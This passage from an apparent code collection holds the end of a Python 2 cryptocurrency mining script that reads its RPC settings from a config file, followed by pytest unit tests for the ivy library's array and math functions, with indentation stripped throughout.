continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 7740
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
test_general.py
|
"""
Collection of tests for unified general functions
"""
# global
import os
import math
import time
import einops
import pytest
import threading
import numpy as np
from numbers import Number
from collections.abc import Sequence
import torch.multiprocessing as multiprocessing
# local
import ivy
import ivy.functional.backends.numpy
import ivy.functional.backends.jax
import ivy.functional.backends.tensorflow
import ivy.functional.backends.torch
import ivy.functional.backends.mxnet
import ivy_tests.test_ivy.helpers as helpers
# Helpers #
# --------#
def _get_shape_of_list(lst, shape=()):
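    # recursively infer the shape of a nested list, raising a ValueError
    # when sibling lists at the same depth differ in length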
if not lst:
return []
if not isinstance(lst, Sequence):
return shape
if isinstance(lst[0], Sequence):
l = len(lst[0])
if not all(len(item) == l for item in lst):
msg = 'not all lists have the same length'
raise ValueError(msg)
shape += (len(lst),)
shape = _get_shape_of_list(lst[0], shape)
return shape
# Tests #
# ------#
# set_framework
@pytest.mark.parametrize(
"fw_str", ['numpy', 'jax', 'torch', 'mxnet'])
def test_set_framework(fw_str, dev, call):
ivy.set_framework(fw_str)
ivy.unset_framework()
# use_framework
def test_use_within_use_framework(dev, call):
with ivy.functional.backends.numpy.use:
pass
with ivy.functional.backends.jax.use:
pass
with ivy.functional.backends.tensorflow.use:
pass
with ivy.functional.backends.torch.use:
pass
with ivy.functional.backends.mxnet.use:
pass
@pytest.mark.parametrize(
"allow_duplicates", [True, False])
def test_match_kwargs(allow_duplicates):
def func_a(a, b, c=2):
pass
func_b = lambda a, d, e=5: None
class ClassA:
def __init__(self, c, f, g=3):
pass
kwargs = {'a': 0, 'b': 1, 'c': 2, 'd': 3, 'e': 4, 'f': 5, 'g': 6}
kwfa, kwfb, kwca = ivy.match_kwargs(kwargs, func_a, func_b, ClassA, allow_duplicates=allow_duplicates)
if allow_duplicates:
assert kwfa == {'a': 0, 'b': 1, 'c': 2}
assert kwfb == {'a': 0, 'd': 3, 'e': 4}
assert kwca == {'c': 2, 'f': 5, 'g': 6}
else:
assert kwfa == {'a': 0, 'b': 1, 'c': 2}
assert kwfb == {'d': 3, 'e': 4}
assert kwca == {'f': 5, 'g': 6}
# def test_get_referrers_recursive(dev, call):
#
# class SomeClass:
# def __init__(self):
# self.x = [1, 2]
# self.y = [self.x]
#
# some_obj = SomeClass()
# refs = ivy.get_referrers_recursive(some_obj.x)
# ref_keys = refs.keys()
# assert len(ref_keys) == 3
# assert 'repr' in ref_keys
# assert refs['repr'] == '[1,2]'
# y_id = str(id(some_obj.y))
# y_refs = refs[y_id]
# assert y_refs['repr'] == '[[1,2]]'
# some_obj_dict_id = str(id(some_obj.__dict__))
# assert y_refs[some_obj_dict_id] == 'tracked'
# dict_refs = refs[some_obj_dict_id]
# assert dict_refs['repr'] == "{'x':[1,2],'y':[[1,2]]}"
# some_obj_id = str(id(some_obj))
# some_obj_refs = dict_refs[some_obj_id]
# assert some_obj_refs['repr'] == str(some_obj).replace(' ', '')
# assert len(some_obj_refs) == 1
# array
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"from_numpy", [True, False])
def test_array(object_in, dtype, from_numpy, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
# to numpy
if from_numpy:
object_in = np.array(object_in)
# smoke test
ret = ivy.array(object_in, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == np.array(object_in).shape
# value test
assert np.allclose(call(ivy.array, object_in, dtype, dev), np.array(object_in).astype(dtype))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support string devices
return
# copy array
@pytest.mark.parametrize(
"x", [[0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
def test_copy_array(x, dtype, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
# smoke test
x = ivy.array(x, dtype, dev)
ret = ivy.copy_array(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(x))
assert id(x) != id(ret)
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support string devices
return
# array_equal
@pytest.mark.parametrize(
"x0_n_x1_n_res", [([0.], [0.], True), ([0.], [1.], False),
([[0.], [1.]], [[0.], [1.]], True),
([[0.], [1.]], [[1.], [2.]], False)])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
def test_array_equal(x0_n_x1_n_res, dtype, dev, call):
if call in [helpers.mx_call] and dtype in ['int16', 'bool']:
        # mxnet supports neither int16 nor bool for the broadcast_equal method used
pytest.skip()
x0, x1, true_res = x0_n_x1_n_res
# smoke test
x0 = ivy.array(x0, dtype, dev)
x1 = ivy.array(x1, dtype, dev)
res = ivy.array_equal(x0, x1)
# type test
assert ivy.is_array(x0)
assert ivy.is_array(x1)
assert isinstance(res, bool) or ivy.is_array(res)
# value test
assert res == true_res
# arrays_equal
@pytest.mark.parametrize(
"xs_n_res", [([[[0.], [1.]], [[0.], [1.]], [[1.], [2.]]], False)])
@pytest.mark.parametrize(
"dtype", ['float32'])
def test_arrays_equal(xs_n_res, dtype, dev, call):
xs, true_res = xs_n_res
# smoke test
x0 = ivy.array(xs[0], dtype, dev)
x1 = ivy.array(xs[1], dtype, dev)
x2 = ivy.array(xs[2], dtype, dev)
res = ivy.arrays_equal([x0, x1, x2])
# type test
assert ivy.is_array(x0)
assert ivy.is_array(x1)
assert ivy.is_array(x2)
assert isinstance(res, bool) or ivy.is_array(res)
# value test
assert res == true_res
# equal
@pytest.mark.parametrize(
"x0_n_x1_n_x2_em_n_res", [([0.], [0.], [0.], False, True),
([0.], [1.], [0.], False, False),
([0.], [1.], [0.], True, [[True, False, True],
[False, True, False],
[True, False, True]]),
({'a': 0}, {'a': 0}, {'a': 1}, True, [[True, True, False],
[True, True, False],
[False, False, True]])])
@pytest.mark.parametrize(
"to_array", [True, False])
def test_equal(x0_n_x1_n_x2_em_n_res, to_array, dev, call):
x0, x1, x2, equality_matrix, true_res = x0_n_x1_n_x2_em_n_res
# smoke test
if isinstance(x0, list) and to_array:
x0 = ivy.array(x0, dev=dev)
x1 = ivy.array(x1, dev=dev)
x2 = ivy.array(x2, dev=dev)
res = ivy.all_equal(x0, x1, x2, equality_matrix=equality_matrix)
# value test
if equality_matrix:
assert np.array_equal(ivy.to_numpy(res), np.array(true_res))
else:
assert res == true_res
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support variable number of input arguments
return
# to_numpy
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_to_numpy(object_in, dtype, tensor_fn, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call in [helpers.tf_graph_call]:
# to_numpy() requires eager execution
pytest.skip()
# smoke test
ret = ivy.to_numpy(tensor_fn(object_in, dtype, dev))
# type test
assert isinstance(ret, np.ndarray)
# cardinality test
assert ret.shape == np.array(object_in).shape
# value test
assert np.allclose(ivy.to_numpy(tensor_fn(object_in, dtype, dev)), np.array(object_in).astype(dtype))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support numpy conversion
return
# to_scalar
@pytest.mark.parametrize(
"object_in", [[0.], [[[1]]], [True], [[1.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_to_scalar(object_in, dtype, tensor_fn, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call in [helpers.tf_graph_call]:
# to_scalar() requires eager execution
pytest.skip()
# smoke test
ret = ivy.to_scalar(tensor_fn(object_in, dtype, dev))
true_val = ivy.to_numpy(ivy.array(object_in, dtype=dtype)).item()
# type test
assert isinstance(ret, type(true_val))
# value test
assert ivy.to_scalar(tensor_fn(object_in, dtype, dev)) == true_val
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support scalar conversion
return
# to_list
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_to_list(object_in, dtype, tensor_fn, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call in [helpers.tf_graph_call]:
# to_list() requires eager execution
pytest.skip()
# smoke test
ret = ivy.to_list(tensor_fn(object_in, dtype, dev))
# type test
assert isinstance(ret, list)
# cardinality test
assert _get_shape_of_list(ret) == _get_shape_of_list(object_in)
# value test
assert np.allclose(np.asarray(ivy.to_list(tensor_fn(object_in, dtype, dev))),
np.array(object_in).astype(dtype))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support list conversion
return
# shape
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"as_tensor", [None, True, False])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_shape(object_in, dtype, as_tensor, tensor_fn, dev, call):
# smoke test
if len(object_in) == 0 and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
ret = ivy.shape(tensor_fn(object_in, dtype, dev), as_tensor)
# type test
if as_tensor:
assert ivy.is_array(ret)
else:
assert isinstance(ret, tuple)
ret = ivy.array(ret)
# cardinality test
assert ret.shape[0] == len(np.asarray(object_in).shape)
# value test
assert np.array_equal(ivy.to_numpy(ret), np.asarray(np.asarray(object_in).shape, np.int32))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support Union
return
# get_num_dims
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"as_tensor", [None, True, False])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_get_num_dims(object_in, dtype, as_tensor, tensor_fn, dev, call):
# smoke test
if len(object_in) == 0 and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
ret = ivy.get_num_dims(tensor_fn(object_in, dtype, dev), as_tensor)
# type test
if as_tensor:
assert ivy.is_array(ret)
else:
assert isinstance(ret, int)
ret = ivy.array(ret)
# cardinality test
assert list(ret.shape) == []
# value test
assert np.array_equal(ivy.to_numpy(ret), np.asarray(len(np.asarray(object_in).shape), np.int32))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support Union
return
# minimum
@pytest.mark.parametrize(
"xy", [([0.7], [0.5]), ([0.7], 0.5), (0.5, [0.7]), ([[0.8, 1.2], [1.5, 0.2]], [0., 1.])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_minimum(xy, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(xy[0], Number) or isinstance(xy[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(xy[0], dtype, dev)
y = tensor_fn(xy[1], dtype, dev)
ret = ivy.minimum(x, y)
# type test
assert ivy.is_array(ret)
# cardinality test
if len(x.shape) > len(y.shape):
assert ret.shape == x.shape
else:
assert ret.shape == y.shape
# value test
assert np.array_equal(call(ivy.minimum, x, y), np.asarray(ivy.functional.backends.numpy.minimum(ivy.to_numpy(x), ivy.to_numpy(y))))
# maximum
@pytest.mark.parametrize(
"xy", [([0.7], [0.5]), ([0.7], 0.5), (0.5, [0.7]), ([[0.8, 1.2], [1.5, 0.2]], [0., 1.])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_maximum(xy, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(xy[0], Number) or isinstance(xy[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(xy[0], dtype, dev)
y = tensor_fn(xy[1], dtype, dev)
ret = ivy.maximum(x, y)
# type test
assert ivy.is_array(ret)
# cardinality test
if len(x.shape) > len(y.shape):
assert ret.shape == x.shape
else:
assert ret.shape == y.shape
# value test
assert np.array_equal(call(ivy.maximum, x, y), np.asarray(ivy.functional.backends.numpy.maximum(ivy.to_numpy(x), ivy.to_numpy(y))))
# clip
@pytest.mark.parametrize(
"x_min_n_max", [(-0.5, 0., 1.5), ([1.7], [0.5], [1.1]), ([[0.8, 2.2], [1.5, 0.2]], 0.2, 1.4),
([[0.8, 2.2], [1.5, 0.2]], [[1., 1.], [1., 1.]], [[1.1, 2.], [1.1, 2.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_clip(x_min_n_max, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_min_n_max[0], Number) or isinstance(x_min_n_max[1], Number) or isinstance(x_min_n_max[2], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_min_n_max[0], dtype, dev)
min_val = tensor_fn(x_min_n_max[1], dtype, dev)
max_val = tensor_fn(x_min_n_max[2], dtype, dev)
if ((min_val.shape != [] and min_val.shape != [1]) or (max_val.shape != [] and max_val.shape != [1]))\
and call in [helpers.mx_call]:
# mxnet only supports numbers or 0 or 1 dimensional arrays for min and max while performing clip
pytest.skip()
ret = ivy.clip(x, min_val, max_val)
# type test
assert ivy.is_array(ret)
# cardinality test
max_shape = max([x.shape, min_val.shape, max_val.shape], key=lambda x_: len(x_))
assert ret.shape == max_shape
# value test
assert np.array_equal(call(ivy.clip, x, min_val, max_val),
np.asarray(ivy.functional.backends.numpy.clip(ivy.to_numpy(x), ivy.to_numpy(min_val), ivy.to_numpy(max_val))))
# clip_vector_norm
# @pytest.mark.parametrize(
# "x_max_norm_n_p_val_clipped",
# [(-0.5, 0.4, 2., -0.4), ([1.7], 1.5, 3., [1.5]),
# ([[0.8, 2.2], [1.5, 0.2]], 4., 1., [[0.6808511, 1.8723406], [1.2765958, 0.17021278]]),
# ([[0.8, 2.2], [1.5, 0.2]], 2.5, 2., [[0.71749604, 1.9731141], [1.345305, 0.17937401]])])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_clip_vector_norm(x_max_norm_n_p_val_clipped, dtype, tensor_fn, dev, call):
# # smoke test
# if call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x_max_norm_n_p_val_clipped[0], dtype, dev)
# max_norm = x_max_norm_n_p_val_clipped[1]
# p_val = x_max_norm_n_p_val_clipped[2]
# clipped = x_max_norm_n_p_val_clipped[3]
# ret = ivy.clip_vector_norm(x, max_norm, p_val)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == (x.shape if len(x.shape) else (1,))
# # value test
# assert np.allclose(call(ivy.clip_vector_norm, x, max_norm, p_val), np.array(clipped))
# # compilation test
# if call is helpers.torch_call:
# # pytorch jit cannot compile global variables, in this case MIN_DENOMINATOR
# return
# round
@pytest.mark.parametrize(
"x_n_x_rounded", [(-0.51, -1), ([1.7], [2.]), ([[0.8, 2.2], [1.51, 0.2]], [[1., 2.], [2., 0.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_round(x_n_x_rounded, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_rounded[0], Number) or isinstance(x_n_x_rounded[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_rounded[0], dtype, dev)
ret = ivy.round(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.array_equal(call(ivy.round, x), np.array(x_n_x_rounded[1]))
# floormod
@pytest.mark.parametrize(
"x_n_divisor_n_x_floormod", [(2.5, 2., 0.5), ([10.7], [5.], [0.7]),
([[0.8, 2.2], [1.7, 0.2]], [[0.3, 0.5], [0.4, 0.11]], [[0.2, 0.2], [0.1, 0.09]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_floormod(x_n_divisor_n_x_floormod, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_divisor_n_x_floormod[0], Number) or isinstance(x_n_divisor_n_x_floormod[1], Number) or
isinstance(x_n_divisor_n_x_floormod[2], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_divisor_n_x_floormod[0], dtype, dev)
divisor = ivy.array(x_n_divisor_n_x_floormod[1], dtype, dev)
ret = ivy.floormod(x, divisor)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.floormod, x, divisor), np.array(x_n_divisor_n_x_floormod[2]))
# floor
@pytest.mark.parametrize(
"x_n_x_floored", [(2.5, 2.), ([10.7], [10.]), ([[3.8, 2.2], [1.7, 0.2]], [[3., 2.], [1., 0.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_floor(x_n_x_floored, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_floored[0], Number) or isinstance(x_n_x_floored[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_floored[0], dtype, dev)
ret = ivy.floor(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.floor, x), np.array(x_n_x_floored[1]))
# ceil
@pytest.mark.parametrize(
"x_n_x_ceiled", [(2.5, 3.), ([10.7], [11.]), ([[3.8, 2.2], [1.7, 0.2]], [[4., 3.], [2., 1.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_ceil(x_n_x_ceiled, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_ceiled[0], Number) or isinstance(x_n_x_ceiled[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_ceiled[0], dtype, dev)
ret = ivy.ceil(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.ceil, x), np.array(x_n_x_ceiled[1]))
# abs
@pytest.mark.parametrize(
"x_n_x_absed", [(-2.5, 2.5), ([-10.7], [10.7]), ([[-3.8, 2.2], [1.7, -0.2]], [[3.8, 2.2], [1.7, 0.2]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_abs(x_n_x_absed, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_absed[0], Number) or isinstance(x_n_x_absed[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_absed[0], dtype, dev)
ret = ivy.abs(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.abs, x), np.array(x_n_x_absed[1]))
# argmax
# @pytest.mark.parametrize(
# "x_n_axis_x_argmax", [([-0.3, 0.1], None, [1]), ([[1.3, 2.6], [2.3, 2.5]], 0, [1, 0]),
# ([[1.3, 2.6], [2.3, 2.5]], 1, [1, 1])])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_argmax(x_n_axis_x_argmax, dtype, tensor_fn, dev, call):
# # smoke test
# x = ivy.array(x_n_axis_x_argmax[0], dtype, dev)
# axis = x_n_axis_x_argmax[1]
# ret = ivy.argmax(x, axis)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert tuple(ret.shape) == (len(x.shape),)
# # value test
# assert np.allclose(call(ivy.argmax, x, axis), np.array(x_n_axis_x_argmax[2]))
# argmin
@pytest.mark.parametrize(
"x_n_axis_x_argmin", [([-0.3, 0.1], None, [0]), ([[1.3, 2.6], [2.3, 2.5]], 0, [0, 1]),
([[1.3, 2.6], [2.3, 2.5]], 1, [0, 0])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_argmin(x_n_axis_x_argmin, dtype, tensor_fn, dev, call):
# smoke test
x = tensor_fn(x_n_axis_x_argmin[0], dtype, dev)
axis = x_n_axis_x_argmin[1]
ret = ivy.argmin(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
assert tuple(ret.shape) == (len(x.shape),)
# value test
assert np.allclose(call(ivy.argmin, x, axis), np.array(x_n_axis_x_argmin[2]))
# argsort
# @pytest.mark.parametrize(
# "x_n_axis_x_argsort", [([1, 10, 26.9, 2.8, 166.32, 62.3], -1, [0, 3, 1, 2, 5, 4])])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_argsort(x_n_axis_x_argsort, dtype, tensor_fn, dev, call):
# # smoke test
# x = tensor_fn(x_n_axis_x_argsort[0], dtype, dev)
# axis = x_n_axis_x_argsort[1]
# ret = ivy.argsort(x, axis)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert tuple(ret.shape) == (6,)
# # value test
# assert np.allclose(call(ivy.argsort, x, axis), np.array(x_n_axis_x_argsort[2]))
# arange
@pytest.mark.parametrize(
"stop_n_start_n_step", [[10, None, None], [10, 2, None], [10, 2, 2]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_arange(stop_n_start_n_step, dtype, tensor_fn, dev, call):
# smoke test
stop, start, step = stop_n_start_n_step
if (isinstance(stop, Number) or isinstance(start, Number) or isinstance(step, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
if tensor_fn == helpers.var_fn and call is helpers.torch_call:
# pytorch does not support arange using variables as input
pytest.skip()
args = list()
if stop:
stop = tensor_fn(stop, dtype, dev)
args.append(stop)
if start:
start = tensor_fn(start, dtype, dev)
args.append(start)
if step:
step = tensor_fn(step, dtype, dev)
args.append(step)
ret = ivy.arange(*args, dtype=dtype, dev=dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == (int((ivy.to_list(stop) -
(ivy.to_list(start) if start else 0))/(ivy.to_list(step) if step else 1)),)
# value test
assert np.array_equal(call(ivy.arange, *args, dtype=dtype, dev=dev),
np.asarray(ivy.functional.backends.numpy.arange(*[ivy.to_numpy(arg) for arg in args], dtype=dtype)))
# linspace
@pytest.mark.parametrize(
"start_n_stop_n_num_n_axis", [[1, 10, 100, None], [[[0., 1., 2.]], [[1., 2., 3.]], 150, -1],
[[[[-0.1471, 0.4477, 0.2214]]], [[[-0.3048, 0.3308, 0.2721]]], 6, -2]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_linspace(start_n_stop_n_num_n_axis, dtype, tensor_fn, dev, call):
# smoke test
start, stop, num, axis = start_n_stop_n_num_n_axis
if (isinstance(start, Number) or isinstance(stop, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
start = tensor_fn(start, dtype, dev)
stop = tensor_fn(stop, dtype, dev)
ret = ivy.linspace(start, stop, num, axis, dev=dev)
# type test
assert ivy.is_array(ret)
# cardinality test
target_shape = list(start.shape)
target_shape.insert(axis + 1 if (axis and axis != -1) else len(target_shape), num)
assert ret.shape == tuple(target_shape)
# value test
assert np.allclose(call(ivy.linspace, start, stop, num, axis, dev=dev),
np.asarray(ivy.functional.backends.numpy.linspace(ivy.to_numpy(start), ivy.to_numpy(stop), num, axis)))
# logspace
@pytest.mark.parametrize(
"start_n_stop_n_num_n_base_n_axis", [[1, 10, 100, 10., None], [[[0., 1., 2.]], [[1., 2., 3.]], 150, 2., -1],
[[[[-0.1471, 0.4477, 0.2214]]], [[[-0.3048, 0.3308, 0.2721]]], 6, 5., -2]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_logspace(start_n_stop_n_num_n_base_n_axis, dtype, tensor_fn, dev, call):
# smoke test
start, stop, num, base, axis = start_n_stop_n_num_n_base_n_axis
if (isinstance(start, Number) or isinstance(stop, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
start = tensor_fn(start, dtype, dev)
stop = tensor_fn(stop, dtype, dev)
ret = ivy.logspace(start, stop, num, base, axis, dev=dev)
# type test
assert ivy.is_array(ret)
# cardinality test
target_shape = list(start.shape)
target_shape.insert(axis + 1 if (axis and axis != -1) else len(target_shape), num)
assert ret.shape == tuple(target_shape)
# value test
assert np.allclose(call(ivy.logspace, start, stop, num, base, axis, dev=dev),
ivy.functional.backends.numpy.logspace(ivy.to_numpy(start), ivy.to_numpy(stop), num, base, axis))
# concatenate
@pytest.mark.parametrize(
"x1_n_x2_n_axis", [(1, 10, 0), ([[0., 1., 2.]], [[1., 2., 3.]], 0), ([[0., 1., 2.]], [[1., 2., 3.]], 1),
([[[-0.1471, 0.4477, 0.2214]]], [[[-0.3048, 0.3308, 0.2721]]], -1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_concatenate(x1_n_x2_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x1, x2, axis = x1_n_x2_n_axis
if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x1 = tensor_fn(x1, dtype, dev)
x2 = tensor_fn(x2, dtype, dev)
ret = ivy.concatenate((x1, x2), axis)
# type test
assert ivy.is_array(ret)
# cardinality test
axis_val = (axis % len(x1.shape) if (axis is not None and len(x1.shape) != 0) else len(x1.shape) - 1)
if x1.shape == ():
expected_shape = (2,)
else:
expected_shape = tuple([item * 2 if i == axis_val else item for i, item in enumerate(x1.shape)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.concatenate, [x1, x2], axis),
np.asarray(ivy.functional.backends.numpy.concatenate([ivy.to_numpy(x1), ivy.to_numpy(x2)], axis)))
# flip
# @pytest.mark.parametrize(
# "x_n_axis_n_bs", [(1, 0, None), ([[0., 1., 2.]], None, (1, 3)), ([[0., 1., 2.]], 1, (1, 3)),
# ([[[-0.1471, 0.4477, 0.2214]]], None, None)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_flip(x_n_axis_n_bs, dtype, tensor_fn, dev, call):
# # smoke test
# x, axis, bs = x_n_axis_n_bs
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret = ivy.flip(x, axis, bs)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == x.shape
# # value test
